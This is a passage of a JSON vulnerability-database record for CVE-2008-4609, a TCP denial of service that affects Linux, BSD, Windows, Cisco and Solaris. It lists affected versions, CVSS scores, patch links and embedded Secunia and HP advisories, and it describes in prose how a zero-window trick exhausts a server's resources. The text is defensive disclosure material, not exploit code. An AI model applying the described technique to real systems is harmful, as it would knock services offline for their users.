                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3jx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yg3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(7a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:4.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.24:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.63:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.44:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.49:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:3.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:1.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:-:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:-:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000:-:sp4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_blade_switch_3020_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "12.2\\(50\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_blade_switch_3020:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_blade_switch_3120_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "12.2\\(50\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_blade_switch_3120:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_blade_switch_3120x_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "12.2\\(50\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_blade_switch_3120x:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Robert E. Lee and Jack C. Lewis",
    "sources": [
      {
        "db": "BID",
        "id": "31545"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2008-4609",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2008-4609",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-34734",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2008-4609",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#723308",
            "trust": 0.8,
            "value": "15.59"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200810-307",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-34734",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2008-4609",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. Part of the Transmission Control Protocol (TCP) specification (RFC 1122) allows a receiver to advertise a zero byte window, instructing the sender to maintain the connection but not send additional TCP payload data. The sender should then probe the receiver to check if the receiver is ready to accept data. Narrow interpretation of this part of the specification can create a denial-of-service vulnerability. By advertising a zero receive window and acknowledging probes, a malicious receiver can cause a sender to consume resources (TCP state, buffers, and application memory), preventing the targeted service or system from handling legitimate connections. Transmission Control Protocol (TCP) Multiple implementations of service disruption (DoS) Vulnerabilities exist. RFC793 It is prescribed by Transmission Control Protocol (TCP) Implementation of service disruption due to misuse of available resources after connection establishment (DoS) Vulnerabilities exist.Service operation disrupted by a remote third party (DoS) There is a possibility of being attacked. The core TCP/IP protocol is prone to multiple remote denial-of-service vulnerabilities. \nThe issues are tracked by Cisco Bug IDs CSCsv04836, CSCsv07712, CSCsv66169, CSCsv02768, CSCsv08325, and CSCsv08579. \nThese issues are reported to affect multiple vendors\u0027 implementations of the TCP/IP stack. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nWindows 2000 TCP/IP Window Size Denial of Service Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA36597\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36597/\n\nDESCRIPTION:\nTwo vulnerabilities have been reported in Microsoft Windows 2000,\nwhich can be exploited by malicious people to cause a DoS (Denial of\nService). \n\n1) An error in the TCP/IP processing can be exploited to cause a\nsystem to stop responding to new requests by flooding it using\nspecially crafted packets with a TCP receive window size set to a\nvery small value or zero. \n\n2) An error in the TCP/IP processing can be exploited to cause\nconnections to hang indefinitely in a FIN-WAIT-1 or FIN-WAIT-2 state. \nThis can be exploited to cause a system to stop responding to new\nrequests by flooding it using specially crafted packets with a TCP\nreceive window size set to a very small value or zero. \n\nSOLUTION:\nAccording to the vendor, no patches will be made available as it\nwould require re-architecting a significant amount of the OS. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) The vendor credits Jack C. Louis, Outpost24. \n2) The vendor credits Felix Lindner, Recurity Labs. \n\nORIGINAL ADVISORY:\nMS09-048 (KB967723):\nhttp://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c01923093\nVersion: 1\n\nHPSBMI02473 SSRT080138 rev.1 - Cisco Catalyst Blade Switch 3020/3120, Remote Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2009-11-17\nLast Updated: 2009-11-17\n\nPotential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential vulnerability has been identified with the Cisco Catalyst Blade Switch 3020/3021. The vulnerability could be exploited remotely to create a Denial of Service (DoS). \n\nReferences: CVE-2008-4609, Cisco Security Advisory: TCP State Manipulation Denial of Service Vulnerabilities in Multiple Cisco Products(cisco-sa-20090908-tcp24)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nCisco Catalyst Blade Switch 3020 for c-Class BladeSystem running firmware earlier than v12.2(50)\nCisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP running firmware earlier than v12.2(50)\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2008-4609    (AV:N/AC:M/Au:N/C:N/I:N/A:C)       7.1\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided firmware updates to resolve this vulnerability. \n\nProduct\n Firmware Version\n\nCisco Catalyst Blade Switch 3020 for c-Class BladeSystem\n 12.2(50) SE1 or subsequent\n\nCisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP\n 12.2(50) SE1 or subsequent\n\nTo Locate the Firmware Update\n\nBrowse to http://www.hp.com and do the following:\n\nSelect \"Support \u0026 Drivers\"\nIn Step 1 select \"Download drivers and software (and firmware)\"\nIn Step 2 enter \"Cisco Catalyst Blade Switch\"\nClick on \"Go\"\nSelect the desired product\nSelect the desired Windows operating system\nClick on \"Firmware - Blade Infrastructure\"\n\nPRODUCT SPECIFIC INFORMATION\nNone\n\nHISTORY\nVersion:1 (rev.1) - 17 November 2009 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n    -check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n    -verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin\nrelates to is represented by the 5th and 6th characters\nof the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\nCopyright 2009 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAksEDAMACgkQ4B86/C0qfVm87gCgliWdpIKldzOKHRvJA5r9gR4Z\nge0AoMu3ueCbIB4y3HUmT/jReUzE4jym\n=uBei\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      },
      {
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "db": "BID",
        "id": "31545"
      },
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "db": "PACKETSTORM",
        "id": "81054"
      },
      {
        "db": "PACKETSTORM",
        "id": "82772"
      }
    ],
    "trust": 2.97
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-34734",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2008-4609",
        "trust": 3.0
      },
      {
        "db": "USCERT",
        "id": "TA09-251A",
        "trust": 2.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#723308",
        "trust": 2.0
      },
      {
        "db": "BID",
        "id": "31545",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "36597",
        "trust": 0.9
      },
      {
        "db": "VUPEN",
        "id": "ADV-2009-2954",
        "trust": 0.8
      },
      {
        "db": "VUPEN",
        "id": "ADV-2009-2567",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "36802",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "36602",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "36603",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "37044",
        "trust": 0.8
      },
      {
        "db": "USCERT",
        "id": "SA09-251A",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "82772",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-34734",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2008-4609",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "81054",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#723308"
      },
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      },
      {
        "db": "VULMON",
        "id": "CVE-2008-4609"
      },
      {
        "db": "BID",
        "id": "31545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-002090"
      },
      {
        "db": "PACKETSTORM",
        "id": "81054"
      },
      {
        "db": "PACKETSTORM",
        "id": "82772"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200810-307"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-4609"
      }
    ]
  },
  "id": "VAR-200810-0010",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-34734"
      }
    ],
    "trust": 0.8899559444444445
  },
  "last_update_date": "2024-07-23T21:21:00.936000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "sk42723",
        "trust": 0.8,
        "url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk42723"
      },
      {
        "title": "cisco-sa-20090908-tcp24",
        "trust": 0.8,
        "url": "http://www.cisco.com/warp/public/707/cisco-sa-20090908-tcp24.shtml"
      },
      {
        "title": "20091009",
        "trust": 0.8,
        "url": "http://www.furukawa.co.jp/fitelnet/topic/vulnera_20091009.html"
      },
      {
        "title": "MS09-048",
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms09-048.mspx"
      },
      {
        "title": "NV09-014",
        "trust": 0.8,
        "url": "http://www.nec.co.jp/security-info/secinfo/nv09-014.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2012 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012verbose-392736.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2012",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html"
      },
      {
        "title": "TCP\u306e\u5b9f\u88c5\u306b\u304a\u3051\u308b\u30b5\u30fc\u30d3\u30b9\u904b\u7528\u59a8\u5bb3(DoS)\u306e\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://www.rtpro.yamaha.co.jp/rt/faq/security/vu943657.html"
      },
      {
        "title": "SA41",
        "trust": 0.8,
        "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa41"
      },
      {
        "title": "July 2012 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/july_2012_critical_patch_update"
      },
      {
        "title": "TCP\u30bb\u30c3\u30b7\u30e7\u30f3\u51e6\u7406\u306b\u95a2\u3059\u308b\u8106\u5f31\u6027",
        "trust": 0.8,
